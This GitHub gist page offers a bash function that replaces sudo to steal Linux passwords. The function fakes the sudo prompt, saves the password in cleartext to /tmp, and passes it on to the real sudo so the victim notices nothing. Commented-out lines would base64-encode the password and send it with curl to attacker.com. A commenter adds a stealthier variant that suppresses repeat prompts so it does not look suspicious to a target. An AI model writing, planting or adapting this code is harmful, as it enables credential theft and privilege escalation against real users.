Skip to content

Instantly share code, notes, and snippets.

@tokyoneon

tokyoneon/sudo

Last active September 19, 2022 11:02
Show Gist options
  • Star 26 You must be signed in to star a gist
  • Fork 8 You must be signed in to fork a gist
  • Save tokyoneon/34ce1c9e1530a12eb392b1eab09fcbac to your computer and use it in GitHub Desktop.
Save tokyoneon/34ce1c9e1530a12eb392b1eab09fcbac to your computer and use it in GitHub Desktop.
Download ZIP
Sudo function for stealing Linux passwords
Raw
sudo
function sudo ()
{
# https://null-byte.com/privesc-0194190/
realsudo="$(which sudo)";
read -s -p "[sudo] password for $USER: " inputPasswd;
printf "\n";
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
$realsudo "${@:1}"
}
@benbusby
Copy link

benbusby commented Jan 8, 2020

Nice! There's one small change I think is worthwhile though:

function sudo () {
    realsudo="$(which sudo)"

    if grep -Fqs "$USER" /tmp/hackedPasswd.txt
    then
        $realsudo "${@:1}"
    else
        read -s -p "[sudo] password for $USER: " inputPasswd
        printf "\n"; printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt
        $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" > /dev/null 2>&1
        $realsudo "${@:1}"
    fi
}

This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment